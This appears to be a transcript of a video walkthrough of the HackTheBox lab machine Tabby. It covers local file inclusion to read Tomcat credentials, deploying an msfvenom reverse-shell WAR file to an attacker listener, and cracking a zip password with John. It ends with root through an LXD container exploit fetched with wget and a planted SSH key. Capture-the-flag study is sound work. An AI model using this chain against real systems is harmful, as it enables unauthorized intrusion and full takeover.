What's up everyone? Today I'm doing an easy Linux machine from HackTheBox called Tabby. We start this box off with nmap and we find a tomcat instance running on port 8080 and a web server on port 80. It turns out the web server is vulnerable to LFI, so we just read the tomcat configuration to get access to the application, where we deploy a war file to get a reverse shell. From there we find an encrypted backup that we can just crack with John to get access to the user ash. And for root, we set up a privileged LXC container to mount the file system as the container's root user, and from there we just own the file system. So let's get started. We start this box off with nmap, svscoa, put it in the nmap directory and call it Tabby, and the IP address is 10.10.10.194. I've already run this, so let's take a look at the output. And we can see SSH is open, port 80 is running a web server, mega hosting, and port 8080 is open, and it is running Apache Tomcat. So let's check out port 80. And we can see mega hosting is the title, dedicated servers starting from 99 USD. So if we go and start browsing the website, plans and services, we can look at their servers. Most of this is just not going to work. Free trial just takes us back to the home page. We can see here there's a link to news for news PHP, and the file is statement, and it takes us to mega hosting, so we probably need to add this to Etsy hosts. And refreshing the page, we can see that it loads something with this file. So we can try changing this to see if this is vulnerable to local file inclusion. And it looks like it is. We're able to read Etsy password. So from here we can see all the users. We see Tomcat, SQL. So from here we can target Tomcat, which is running on port 8080. This is the default Tomcat homepage. We can see that here, and it can be found on the file system at varlib tomcat web apps root index. So let's see if we can access this file via the LFI. And we can see the same page. So if we continue reading, it says users are defined in Etsy Tomcat 9 Tomcat users. So if we grab this and try to look at the users, we don't see anything. But we do see that Tomcat is installed in user share Tomcat 9. So if we grab this installation directory and we look in user share Tomcat 9, we might find something in here. So it said it's under Etsy Tomcat users, or Etsy Tomcat 9 Tomcat users, so we can try getting rid of this. And we see the XML file for Tomcat. So in here we have Tomcat and the password. So I'll add this to our notes and we can try to get logged into Tomcat. And this was the URL we accessed it with. Just put this back on my clipboard. Okay, so we'll try to log in to the manager web app with Tomcat and the password. And we get a 403 access denied. Make sure we have the password right, secure password 123. We do, so maybe we can't access, and we have the host manager web app, so we can try this one, Tomcat and the password. And we're able to get into the virtual host manager. So from here, we can add a virtual host, we can deploy an application, or we can upload a WAR file. So if we just head over to Google and we look for upload WAR file to Tomcat curl, we have a gist that we can look at. And so when we're reading this, it just says, hey, upload file. But there's a little note here that says Tomcat 7 uses manager text undeploy and manager text deploy paths. So if we grab this, and we come over here and we want to create a WAR file, we'll just do msfvenom, list payloads, grep for anything Java. Okay, and while that's going, I'm going to get this curl command going. Okay, so we have JSP shell reverse TCP. That's perfect. So we can do msfvenom. The payload is that. Our L port, we'll do 443. Our L host is 10.10.14.18. The format we want is a WAR file, and we'll just put that into evil.war. Okay, so while that's going, we'll get this going. So the path is evil. And we're gonna do Tomcat and our password. Like that. And the upload is evil.war. Oh, at localhost, that's not correct. It is 10.10.10.194. Okay, and we get a method 405 not allowed. So we might need to use that other path that was mentioned, which is manager text deploy. So try that again, and we'll do manager text deploy. And it said, okay, deployed application at context path evil. So if we come over here and we look at the host manager and we want to go to host manager evil, it does not exist. What if we just went to evil? It might exist. So maybe it's running it. So we'll set up a netcat listener on 443. Run this. And we got to connect back. So that looks like a shell on the box. We'll see which Python. I don't see Python ls. Okay, so maybe there's which Python 3. Cool. So we can do Python 3 -c import pty, pty.spawn, then bash to get a better shell. Hit Control Z, stty raw -echo, type fg, hit enter twice, and now we should have tab completion. Cool. We'll export our term to be screen, and then we can type clear, and that'll work. So from here, we can kind of look around the file system, var lib, look in the root, look in var. We see all these directories. Maybe there's some interesting stuff here. And just kind of looking through, we just see that one HTML in www. We have some logs. Nothing too interesting here, so let's go look at the web server in www and HTML. Looks like we have some files. So if I wanted to list all of the files in here, we can just find dot, type is file, and it'll list them all. And if we're not interested in any of the assets, we can just grep -v for assets. And in here, in files, we see there's a backup file. And we might be able to access this via the web server. So if we went into files and that file name, it does not like that. Oh, but this might be in this virtual host because it might not be running on port 80. So we can try that again. So files, and we hit the backup file. So I'll save that. We'll move downloads 1616 to here, and we'll make a directory called backup, and we'll move that into backup, and we'll try to unzip it. And we need a password, so we can try zip to John on 1616. It is assumed that all files in each archive have the same password. So this is kind of what it came back with. So there was a file that was not encrypted. Or it says this directory wasn't encrypted, so that's interesting. But anyway, we are left with this hash that we need to crack. So I'm not sure if we can just pass this entire thing into a file and call it hashes. We might need to modify this. And we'll try John with our word list is user share word lists rocku.txt on hashes. And it cracked it pretty much instantly. So it says admin at IT. So we can John -- show on that backup. Oh, on hashes. And it tells us that it cracked it. So admin at IT. So if we unzip it, admin at IT is the password. It doesn't really look like there's anything in here, but with some guesswork, we might assume that this is a password for a user. So if we look at the etc password file again, we see we have a user named Ash. So if we tried to switch over to Ash, and we tried admin at IT, we're able to swap to the user Ash. So if we head to his home directory, we can read user.txt, and that's user completed. Now that we have user, we can start looking for ways to privesk. So if we look at ID, we can see that we are a member of the LXD group, which is a container service. So if we just searchsploit for LXD, we can see there is a privesk right here. So if we look at the script, searchsploit -m, we can just move that to exploit, or I'll call it lxd.sh. We'll make a directory, call it exploit. We'll move LXD in there. Okay, and looking at it, here's some instructions. So we download build Alpine. So I'll do that. Okay. Step 2, build Alpine. There's a script. So if we go into build Alpine, I guess we go to exploit, and then we run that again. Oh, there we go. There is a build Alpine script that we can just run. So we'll just run build Alpine. Looks like it's gonna grab it. and then run the script. Okay, so we can just kind of Python -m simple HTTP server, and we'll go make a directory temp evil, head into temp evil, and we will wget HTTP RIP address 10.10.14.18, port 8000, lxd.sh, 8000, not 800. Okay, we grabbed the script. We probably need to grab this. So we'll wget that as well. And if we actually look at the exploit, maybe does it take a file as an argument or something? Yeah, okay, so usage is -f file name. So we're going to want to look at the permissions of this. We'll need to make this executable, so we'll just chmod 755 it, lxd.sh. It's executable, so we can run lxd, and -f and the file name, which is this Alpine file. And it doesn't like that, so maybe we need to DOS to Unix it. We'll wget that again. Once we start up our Python server again. There we go. Chmod 755 it. Run it. User bin in bash does not like that. So if we just go into the shell script, okay, that looks weird. Something's wrong. Yeah, so let's just get rid of this. And we'll change this to bin bash. Which bash. Yeah. Okay, so we'll save that. We'll grab it one more time. Oh, it's saved as a different file, so that's probably why. So we'll remove lxd everything. There we go. Do this again. Chmod it. Run it. And see if our script works. Creating privask, error not found. If this is your first time running LXD, you should also run LXD init. So let's try LXD init. Clustering, no. New storage pool, sure. Default's fine. dir, no. Yes, that's fine. None. Or auto, I guess. No. Sure. No. Error opening Alpine. No such file or directory. Huh. F, maybe we need to pass it like this. It really doesn't like this. So maybe we just need to move this somewhere else. We'll just move it into Ash's directory. And we'll try this again. Oh, and then we'll move temp evil lxd to here. Run that again. And now it seems to work. Okay, so it looks like it dropped us into a shell. Who am I? Looks like we're root, but what's the host name? The host name is privesk, because that is the name of the container. So if we go into the root directory, and we go into root, we don't see anything here. We just see Ash's history. So we need to figure out exactly where this mounted, the sys file system. So it looks like it puts it in mount root. So if we went into mount, into root, we just have Ash history again. So if we look for find in the root directory, the name of the file is root.txt, and the type is a file, and we want to send all errors to dev null. Do we get a response? It's in mount root root. Okay, so mount root is where the root of the file system is, and then if we go into root, we can read root.txt. But we don't actually have a root shell on the box. So what I want to do is I'll just SSH keygen, and what file? We'll just call it rootkey, no passphrase, and we'll cat rootkey.pub, and we'll copy this. That way we can add it to SSH. So if we make a directory called SSH and we head into it, we see authorized keys. So if we echo that into authorized keys, we can SSH in with our ID. Root at 10.10.10.194. And we're finally root at Tabby. So that's pretty much the box. It looks like when we were creating that SSH key, there was already a RSA key here, so you didn't have to create your own. You could just copy the private key off of the file, or off of the file system, and SSH in that way. But yeah, that's pretty much the box. I hope y'all enjoyed it, and I'll catch you guys next week.